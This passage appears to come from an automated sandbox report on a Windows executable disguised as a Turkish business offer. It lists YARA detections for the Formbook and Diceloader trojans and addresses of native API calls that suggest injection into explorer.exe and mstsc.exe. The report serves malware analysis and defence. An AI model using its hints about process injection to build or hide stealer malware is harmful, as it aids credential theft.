          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1623721118.00000000011EF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000006.00000002.2823254798.000000000DEC4000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 6148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 4260, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: mstsc.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041A330 NtCreateFile,4_2_0041A330
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041A3E0 NtReadFile,4_2_0041A3E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041A460 NtClose,4_2_0041A460
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041A510 NtAllocateVirtualMemory,4_2_0041A510
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041A3DB NtReadFile,4_2_0041A3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041A50F NtAllocateVirtualMemory,4_2_0041A50F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01B82BF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82B60 NtClose,LdrInitializeThunk,4_2_01B82B60
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82AD0 NtReadFile,LdrInitializeThunk,4_2_01B82AD0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01B82DF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82DD0 NtDelayExecution,LdrInitializeThunk,4_2_01B82DD0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_01B82D30
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_01B82D10
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_01B82CA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01B82C70
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82FB0 NtResumeThread,LdrInitializeThunk,4_2_01B82FB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01B82F90
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82FE0 NtCreateFile,LdrInitializeThunk,4_2_01B82FE0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82F30 NtCreateSection,LdrInitializeThunk,4_2_01B82F30
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01B82EA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_01B82E80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B84340 NtSetContextThread,4_2_01B84340
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B84650 NtSuspendThread,4_2_01B84650
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82BA0 NtEnumerateValueKey,4_2_01B82BA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82B80 NtQueryInformationFile,4_2_01B82B80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82BE0 NtQueryValueKey,4_2_01B82BE0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82AB0 NtWaitForSingleObject,4_2_01B82AB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82AF0 NtWriteFile,4_2_01B82AF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82DB0 NtEnumerateKey,4_2_01B82DB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82D00 NtSetInformationFile,4_2_01B82D00
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82CF0 NtOpenProcess,4_2_01B82CF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82CC0 NtQueryVirtualMemory,4_2_01B82CC0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82C00 NtQueryInformationProcess,4_2_01B82C00
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82C60 NtCreateKey,4_2_01B82C60
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82FA0 NtQuerySection,4_2_01B82FA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82F60 NtCreateProcessEx,4_2_01B82F60
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82EE0 NtQueueApcThread,4_2_01B82EE0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82E30 NtWriteVirtualMemory,4_2_01B82E30
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B83090 NtSetValueKey,4_2_01B83090
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B83010 NtOpenDirectoryObject,4_2_01B83010
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B835C0 NtCreateMutant,4_2_01B835C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B839B0 NtGetContextThread,4_2_01B839B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B83D10 NtOpenProcessToken,4_2_01B83D10
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B83D70 NtOpenThread,4_2_01B83D70
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAC232 NtCreateFile,6_2_0DEAC232
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEADE12 NtProtectVirtualMemory,6_2_0DEADE12
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEADE0A NtProtectVirtualMemory,6_2_0DEADE0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04BB2CA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04BB2C70
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2C60 NtCreateKey,LdrInitializeThunk,8_2_04BB2C60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04BB2DF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2DD0 NtDelayExecution,LdrInitializeThunk,8_2_04BB2DD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04BB2D10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04BB2EA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2FE0 NtCreateFile,LdrInitializeThunk,8_2_04BB2FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2F30 NtCreateSection,LdrInitializeThunk,8_2_04BB2F30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2AD0 NtReadFile,LdrInitializeThunk,8_2_04BB2AD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04BB2BF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04BB2BE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2B60 NtClose,LdrInitializeThunk,8_2_04BB2B60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB35C0 NtCreateMutant,LdrInitializeThunk,8_2_04BB35C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB4650 NtSuspendThread,8_2_04BB4650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB4340 NtSetContextThread,8_2_04BB4340
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BB2CF0 NtOpenProcess,8_2_04BB2CF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_02F3D63C0_2_02F3D63C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_056570E80_2_056570E8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_056500400_2_05650040
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_0565001A0_2_0565001A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_056570D80_2_056570D8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091074A00_2_091074A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091097D00_2_091097D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091000110_2_09100011
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091050500_2_09105050
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091030810_2_09103081
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091030880_2_09103088
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091038F80_2_091038F8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_09102C500_2_09102C50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091074910_2_09107491
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091034C00_2_091034C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041E8574_2_0041E857
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041DAED4_2_0041DAED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041DA9C4_2_0041DA9C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041E4DB4_2_0041E4DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041D5734_2_0041D573
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041EE4C4_2_0041EE4C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00409E5B4_2_00409E5B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00409E604_2_00409E60
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C081CC4_2_01C081CC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C101AA4_2_01C101AA
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEA1184_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B401004_2_01B40100
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD81584_2_01BD8158
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE20004_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C103E64_2_01C103E6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E3F04_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0A3524_2_01C0A352
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD02C04_2_01BD02C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF02744_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C105914_2_01C10591
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B505354_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFE4F64_2_01BFE4F6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C024464_2_01C02446
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF44204_2_01BF4420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4C7C04_2_01B4C7C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B507704_2_01B50770
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B747504_2_01B74750
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6C6E04_2_01B6C6E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A04_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C1A9A64_2_01C1A9A6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B669624_2_01B66962
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B368B84_2_01B368B8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E8F04_2_01B7E8F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B528404_2_01B52840
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5A8404_2_01B5A840
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C06BD74_2_01C06BD7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0AB404_2_01C0AB40
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA804_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B68DBF4_2_01B68DBF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4ADE04_2_01B4ADE0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BECD1F4_2_01BECD1F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5AD004_2_01B5AD00
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0CB54_2_01BF0CB5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40CF24_2_01B40CF2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50C004_2_01B50C00
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCEFA04_2_01BCEFA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5CFE04_2_01B5CFE0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B42FC84_2_01B42FC8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B70F304_2_01B70F30
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF2F304_2_01BF2F30
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B92F284_2_01B92F28
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC4F404_2_01BC4F40
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0EEDB4_2_01C0EEDB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62E904_2_01B62E90
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0CE934_2_01C0CE93
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0EE264_2_01C0EE26
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50E594_2_01B50E59
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5B1B04_2_01B5B1B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C1B16B4_2_01C1B16B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3F1724_2_01B3F172
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B8516C4_2_01B8516C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0F0E04_2_01C0F0E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C070E94_2_01C070E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFF0CC4_2_01BFF0CC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B570C04_2_01B570C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B9739A4_2_01B9739A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0132D4_2_01C0132D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3D34C4_2_01B3D34C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B552A04_2_01B552A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF12ED4_2_01BF12ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6B2C04_2_01B6B2C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BED5B04_2_01BED5B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C075714_2_01C07571
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B414604_2_01B41460
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0F43F4_2_01C0F43F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0F7B04_2_01C0F7B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C016CC4_2_01C016CC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE59104_2_01BE5910
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B599504_2_01B59950
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6B9504_2_01B6B950
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B538E04_2_01B538E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBD8004_2_01BBD800
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B19B804_2_01B19B80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6FB804_2_01B6FB80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B8DBF94_2_01B8DBF9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC5BF04_2_01BC5BF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0FB764_2_01C0FB76
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEDAAC4_2_01BEDAAC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B95AA04_2_01B95AA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF1AA34_2_01BF1AA3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFDAC64_2_01BFDAC6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C07A464_2_01C07A46
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0FA494_2_01C0FA49
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC3A6C4_2_01BC3A6C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6FDC04_2_01B6FDC0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C01D5A4_2_01C01D5A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C07D734_2_01C07D73
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B53D404_2_01B53D40
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0FCF24_2_01C0FCF2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC9C324_2_01BC9C32
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B51F924_2_01B51F92
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B13FD24_2_01B13FD2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B13FD54_2_01B13FD5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0FFB14_2_01C0FFB1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0FF094_2_01C0FF09
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B59EB04_2_01B59EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAC2326_2_0DEAC232
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAF5CD6_2_0DEAF5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEA6B326_2_0DEA6B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEA6B306_2_0DEA6B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEA3D026_2_0DEA3D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEA99126_2_0DEA9912
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEA20826_2_0DEA2082
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAB0366_2_0DEAB036
